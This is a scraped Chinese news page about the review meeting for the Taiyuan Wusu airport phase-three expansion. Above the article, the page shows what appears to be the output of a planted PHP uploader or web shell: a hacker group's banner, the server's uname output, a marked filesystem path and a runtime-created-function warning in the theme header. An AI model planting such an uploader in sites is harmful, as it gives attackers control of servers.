PHP Uploader - By Phenix-TN & Mr.Anderson
Linux iZwz91hdhujjzqy9icuvwuZ 5.4.0-31-generic #35-Ubuntu SMP Thu May 7 20:20:34 UTC 2020 x86_64
okokok/www/wwwroot/aircn/new_wordpress/wordpressokokok
Warning: Use of undefined constant itongtong - assumed 'itongtong' (this will throw an Error in a future version of PHP) in /www/wwwroot/aircn/new_wordpress/wordpress/wp-content/themes/newsbulk/header.php(29) : runtime-created function on line 1

2020年7月6日至7月8日,太原武宿国际机场三期改扩建工程预可行性研究报告评估会顺利召开,会议采用网络视频方式,本次评审专家组由民航机场规划、空域规划等23位权威专家组成,评估了包括机场总体工程、空管工程、飞行程序、场外配套等七项工程的预可行性研究报告。

  会议期间设计单位对本期改扩建工程的预可研编制情况进行汇报,随后建设单位、设计单位与各专业的专家就预可行性研究报告进行了充分的沟通。其中空管工程部分由华北空管局甘泉副局长带队,华北空管局主要业务部门领导、山西空管分局领导及相关专业技术骨干参加了评审会。会上与专家对预可研报告中的焦点问题进行了仔细的讨论,形成了专家小组意见。

  在7月8日的正式大会上,山西省委常委、常务副省长胡玉亭代表山西省委、山西省政府致辞,评审专家组组长张光辉、空空组组长顾正兵分别宣读了专家组意见,各与会单位代表分别提出了建议和意见。最后,中国民用航空局发展计划司副司长包毅进行了总结讲话。

  会后,山西空管分局将按照评审会议要求,尽快配合设计单位完成三期改扩建空管工程预可行性研究报告的修改以及专家意见的回复工作。

供稿:中国民用航空华北地区空中交通管理局山西分局,来源:民航资源网 作者:张媛 

作者 一潼

发表回复